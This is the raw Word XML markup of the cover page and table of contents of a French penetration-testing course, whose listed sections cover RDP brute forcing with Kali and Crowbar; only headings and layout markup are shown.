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trPr>
          <w:cantSplit/>
          <w:trHeight w:val="2241"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:tcW w:w="8080" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1024"/>
              <w:spacing w:after="80"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> MACROBUTTON </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Cours &amp; TP - Pentest Vulnérabilité Postes Clients</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="1800" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="808080" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="808080" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="808080" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:tcW w:w="8080" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1023"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0a9e97"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0a9e97"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Times New Roman" w:cs="Arial"/>
                <w:color w:val="0a9e97"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">Document </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Times New Roman" w:cs="Arial"/>
                <w:color w:val="0a9e97"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">présentant </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Times New Roman" w:cs="Arial"/>
                <w:color w:val="0a9e97"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">un pentest exploitant les vulnérabilités postes clients</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0a9e97"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="4408" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="808080" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="808080" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="808080" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:tcW w:w="8080" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1015"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="ff0000"/>
                <w:sz w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="4306" w:dyaOrig="333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14.8pt;height:166.5pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" filled="f" stroked="f">
                  <v:path textboxrect="0,0,0,0"/>
                  <v:imagedata r:id="rId14" o:title=""/>
                </v:shape>
                <o:OLEObject DrawAspect="Content" r:id="rId15" ObjectID="_1525042" ProgID="PBrush" ShapeID="_x0000_i2" Type="Embed"/>
              </w:object>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="823" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="808080" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="808080" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="808080" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="808080" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:tcW w:w="8080" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:left="-68"/>
              <w:jc w:val="center"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:rStyle w:val="979"/>
                <w:color w:val="0a9e97"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="979"/>
                <w:color w:val="0a9e97"/>
              </w:rPr>
              <w:t xml:space="preserve">SECURITE-3122</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="1862" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="808080" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="808080" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="808080" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:tcW w:w="4395" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="991"/>
              <w:ind w:left="1064"/>
              <w:rPr>
                <w:rStyle w:val="983"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="983"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Auteur</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="983"/>
              </w:rPr>
              <w:t xml:space="preserve">(s) :</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="991"/>
              <w:ind w:left="1064"/>
              <w:rPr>
                <w:rStyle w:val="984"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="984"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Yann BENHAMRON</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="991"/>
              <w:ind w:left="1064"/>
              <w:rPr>
                <w:rStyle w:val="983"/>
              </w:rPr>
            </w:pPr>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="808080" w:sz="12" w:space="0"/>
              <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="808080" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="808080" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:tcW w:w="3685" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="991"/>
              <w:ind w:left="71"/>
              <w:rPr>
                <w:rStyle w:val="983"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="983"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Destinataire</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="983"/>
              </w:rPr>
              <w:t xml:space="preserve">(s) :</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="991"/>
              <w:ind w:left="71"/>
              <w:rPr>
                <w:rStyle w:val="983"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="984"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Easyformer</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r/>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trPr>
          <w:cantSplit/>
          <w:trHeight w:val="402" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="214" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:left="-68"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6449" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:left="-68"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="983"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Date de modification : </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="983"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="983"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DATE \@ "dd/MM/yy" \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="983"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="983"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">28/12/22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="983"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:left="-68" w:right="-70"/>
              <w:jc w:val="right"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="983"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Version :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="980"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="280" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="3"/>
            <w:tcW w:w="8080" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1033"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1033"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1033"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1033"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1033"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1033"/>
            </w:pPr>
            <w:r/>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1033"/>
            </w:pPr>
            <w:r/>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1033"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1033"/>
              <w:rPr>
                <w:rStyle w:val="983"/>
                <w:rFonts w:ascii="Arial Gras" w:hAnsi="Arial Gras"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial Gras" w:hAnsi="Arial Gras"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1033"/>
            </w:pPr>
            <w:r/>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1033"/>
            </w:pPr>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:footnotePr/>
          <w:endnotePr/>
          <w:type w:val="nextPage"/>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="851" w:left="1417" w:header="851" w:footer="708" w:gutter="0"/>
          <w:cols w:num="1" w:sep="0" w:space="708" w:equalWidth="1"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="989"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="8505" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sommaire</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">page</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="985"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="440" w:leader="none"/>
          <w:tab w:val="right" w:pos="9060" w:leader="dot"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \f \t "Titre de chapitre;1;Sous-fragment;4;EF étiquette;3;EF sous étiquette;4" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116321 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="985"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="440" w:leader="none"/>
          <w:tab w:val="right" w:pos="9060" w:leader="dot"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Prérequis</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116322 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="985"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="440" w:leader="none"/>
          <w:tab w:val="right" w:pos="9060" w:leader="dot"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le Brut force RDP</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116323 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="986"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880" w:leader="none"/>
          <w:tab w:val="right" w:pos="9060" w:leader="dot"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116324 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="986"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880" w:leader="none"/>
          <w:tab w:val="right" w:pos="9060" w:leader="dot"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Les Outils</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116325 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="986"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880" w:leader="none"/>
          <w:tab w:val="right" w:pos="9060" w:leader="dot"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Procédure</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116326 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5</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3.3.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Installation de Kali</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116327 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5</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3.3.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Premiers pas avec Crowbar</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116328 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">6</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3.3.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Utiliser des listes et dictionnaires avec Crowbar</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc123116329 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="985"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="440" w:leader="none"/>
          <w:tab w:val="right" w:pos="9060" w:leader="dot"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
